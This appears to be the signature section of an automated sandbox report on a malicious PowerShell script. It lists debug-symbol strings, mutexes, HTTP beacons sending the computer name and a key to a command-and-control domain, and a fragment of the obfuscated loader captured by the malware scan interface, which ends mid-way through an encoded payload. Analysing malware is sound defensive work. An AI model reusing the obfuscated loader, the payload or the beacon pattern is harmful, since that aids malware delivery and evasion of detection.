Click to jump to signature section
Source: | Binary string: softy.pdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.643068475958.000001A73D8FB000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.643067001006.000001A73B958000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: n.pdb source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbV source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: 6?ll\mscorlib.pdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.643067001006.000001A73B958000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.643067001006.000001A73B958000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: utomation.pdbdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ll\mscorlib.pdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbm source: powershell.exe, 00000001.00000002.643108718460.000001A755E51000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8ZMFQDummoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=eJyEIlHRWOrNmm3PTfwJw7iwIju0uTydR31wGf9D4xQtRSSd97A4zZ5x3kPQqfFsCXGTC0yCOtlfajGLNwzwaoBiykAYmqk9UekyKLvgh04i65ztx-VWhPgBuVrvInEoh1aTs0rbdhXVKODQvJCy3nWDwuLQhcY1Az8Z_YXbaO539d7qOm6BY9trt1KtMh26-WfX |
Source: global traffic | HTTP traffic detected: GET /kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8ZMFQDummoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=eJyEIlHRWOrNmm3PTfwJw7iwIju0uTydR31wGf9D4xQtRSSd97A4zZ5x3kPQqfFsCXGTC0yCOtlfajGLNwzwaoBiykAYmqk9UekyKLvgh04i65ztx-VWhPgBuVrvInEoh1aTs0rbdhXVKODQvJCy3nWDwuLQhcY1Az8Z_YXbaO539d7qOm6BY9trt1KtMh26-WfX |
Source: global traffic | HTTP traffic detected: GET /kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8ZMFQDummoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=eJyEIlHRWOrNmm3PTfwJw7iwIju0uTydR31wGf9D4xQtRSSd97A4zZ5x3kPQqfFsCXGTC0yCOtlfajGLNwzwaoBiykAYmqk9UekyKLvgh04i65ztx-VWhPgBuVrvInEoh1aTs0rbdhXVKODQvJCy3nWDwuLQhcY1Az8Z_YXbaO539d7qOm6BY9trt1KtMh26-WfX |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EF06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php? |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php?id=$env:computername&key=$ukcqoy&s=527 |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EB8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73E722000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EB8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73E722000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527 |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EB8E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527p |
Source: powershell.exe, 00000001.00000002.643068475958.000001A73D91C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000001.00000002.643068475958.000001A73D91C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000001.00000002.643105261034.000001A755B4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic |
Source: powershell.exe, 00000001.00000002.643109343926.000001A7560EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft.co |
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXzS |
Source: powershell.exe, 00000001.00000002.643105261034.000001A755B4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mic8 |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DAC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzS |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73E873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EC3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EC2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8Z |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73E873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcK |
Source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.c |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DAC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXzS |
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73E888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:304:WilStaging_02 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $86zuy3xghtrqwve.(([char[]]@((-8759+(12159-3333)),(1082583/(10676-923)),(-1256+1368),(-4028+(-1825+(15221752/2548))),(9559-9475),(5516-(5445-(-610+(-4271+4921))))) -join ''))( $pt7afszmng9hol5 ) $86zuy3xghtrqwve.((-join (@((354296/5288),(-3056+3164),(571761/5151),(-10032+10147),(4537-4436))| ForEach-Object { [char]$_ })))()$eni4vzuxs2d5yoa.(([char[]]@((658208/(13365-3541)),(-9358+(10414-948)),(633699/(22875963/(30549368/7624))),(742670/6458),(-7430+7531)) -join ''))()[byte[]] $bxrc2jni4slugvt = $pt7afszmng9hol5.(([system.String]::new(@((981-897),(4326-4215),(-5367+(7729736/(-8618+(12028-(487+1500))))),(-4969+5083),(8315-(1920+6281)),(-5956+(11228-(45384750/8770))),(-6445+6566)))))() $cs3pj58qgiuek20=$bxrc2jni4slugvt return $cs3pj58qgiuek20}[System.Text.Encoding]::ascii.(([system.String]::new(@((304022/4282),(324008/(12915408/4026)),(898884/(13560750/1750)),(411182/4954),(7058-(493+6449)),(2257-(-3233+(9152-(12961-9185)))),(39900/(6930-(14782-(68506704/(9823-(1812-311)))))),(-8266+(5951+2425)),(2783-(19467520/7264))))))((nghl3ewmdia0bvsr1z6kjfo9x5q "Kb44enhqZjlvd8TybbolLQ6t+VqiqIimFAaXKSu+2GbnJ0sjBEz69uwTrroOMum1MEZZVPVbkMHQkJ4xnTtEuWhKLCWypxQg45uNrYI1sGNeKBefk8hDmf8tcU6ES5OUyIbD/fc1uYcaiZqXi6KndVb0uoITBRCQxdCdYUfV2EGdj4Dl2dvMgquXvf4USNYyydbZZVd0WUQSDpeSmaJHVCfUXoISyxf3rfJflKXVlcXwGNaTodZB3EK8BbJaWVD6QkPG/RuBX5SsJTIgH5Gd92GfhQ0IWQBVmBzHzmQJ+QidZ5Eve4DA+UooOrZSoNhy4Qf3JgKDhfWUmGapLA+n18uMoq4ZvDiRu1zEw7Y71UYBukrpE/rsgzPk94YFTuXCidDirJsCy5Xeswe5+gZBgWmfqytgvDE9rXSbk0XF+7KyEjplE/Hd4grBE82q+o7CQ7gRouWTIvby0PfPmQlrmnE98OP8FCLbgWlJiOq4OtsHjp0m3TkBVUvMCkaCQkayX8ff5j40lNE2aFXCCWsMAgqSm9ZS/QYwiktBA4aSgGZE6FYWxPaHJQeXgsW+5hoGB7mSH91yNNkkXu2Gwb2KPbKzqJnaFjPnwEddw83PqWAXQlTc0cleiJfyDPFXNgWYjSuFVyNBG9NZDoOKwirN90vD82LsrWux7H/TKY7bNl+xlXWYh/uWid14zBZAn7kdW1YdwzY1J1oqsHUUartNLK6yIRlR1dfYqUWdVxU/LQdQja+eyrJTE/siRqMZuAznF2MLG3rj1ZFKHWAF0md7FjEV74iDiyPeCbIJOaEMqXQk7A4yTd/lxbuUo6+ezlOVbLbOTgtIBo4qb4Mtm9zwc3Z8qBDss47ZrCFVDIEysNrHysXNzI+Ed85xEOQ6T9TeuwVEsSCxMhvn33bIKrZtHrSq/9x3UKZdW/Z2kg3c6xqP75cYzub1iQfRFdaVjf7VCavvwUSWHIkvip+oSSpOGWU1GMiJouqlTcK/TVb12QVUjJylGcvRrROTGWGk6HQASkrXq/OZuTfUqRGXxuuD8a+hi/qavwB9gal4nLb3Nh8OfgRsvvL+PhTlAxNpDUzr1Xms50Y8TPYs2wUpZpVFGOt3/USkntrr9ZkNUxZZ+WVGmvpraSosOuOc12LszKah2QmMD4CHZXK9hNXd1Kdj99sY2yfwJdvbd3s7BRrd0xKoYukqsrd34yfZmOUykAVUu2l+UaXkewmJRc0XAaXSUfwLDabZN7tdQwMXDqhaq4qe37LtABzWvlYCC+XTcZlnrv6yMn/UEadBAbtcptTcI/b//iNyj3RHtvbwKfRJF7ReLrl5VOYntY4MqHtwKhptG |